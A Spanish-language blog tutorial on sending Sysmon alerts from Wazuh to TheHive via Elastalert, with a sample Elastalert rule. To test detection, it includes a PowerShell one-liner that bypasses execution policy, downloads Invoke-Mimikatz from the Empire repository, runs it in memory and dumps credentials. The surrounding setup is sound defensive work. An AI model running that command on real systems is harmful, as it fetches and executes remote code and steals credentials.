Seguimos configurando nuestra infraestructura SIRP Open source (https://red-orbita.com/?p=8726) En pasadas entradas vimos como Integrar Sysmon con wazuh, para poder hacer una correcta gestión de las incidencias vamos a integrar dichas alertas a TheHive mediante Elastalert
Anes de nada vamos a comprobar que funciona correcamente Sysmon y obtenemos relgas, para ello intentamos hacer un Dump de las credenciales en memoria
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"Una vez ejecutado nos vamos a la consola de Kibana y comprobamos el correcto funcionamiento
Ahora nos vamos al servidor donde se encuentra elastalert y generamos la siguiente regla
es_host: localhost
es_port: 9200
name: TODAS LAS ALERTAS SYSMON
type: any
index: wazuh-alerts-3.x-*
num_events: 600
timeframe:
hours: 1
realert:
minutes: 0
filter:
- query:
query_string: {query: '_exists_:data.win.system.message'}
- query:
query_string: {query: '_exists_:data.win.eventdata.integrityLevel'}
- range:
rule.level:
from: 8
to: 15
alert: hivealerter
hive_connection:
hive_host: http://the_hive
hive_port: 9000
hive_apikey: <Paste API key for elastalert user here>
hive_alert_config:
title: '{match[rule][description]}'
type: 'external'
source: 'elastalert'
description: '{match[data][win][system][message]}'
severity: 2
tags: ['Integrity Level: {match[data][win][eventdata][integrityLevel]}','Name: {match[data][win][eventdata][originalFileName]}','Level: {match[rule][level]}', 'Rule id: {match[rule][id]}', '{match[agent][name]}', '{match[rule][groups]}', '{match[_id]}']
tlp: 3
status: 'New'
follow: True
hive_observable_data_mapping:
- ip: "{match[@src_ip]}"
Reiniciamos el servicio
systemctl restart elastalertAhora nos vamos a Thehive y comprobamos que nos haya generado una alerta
:wq!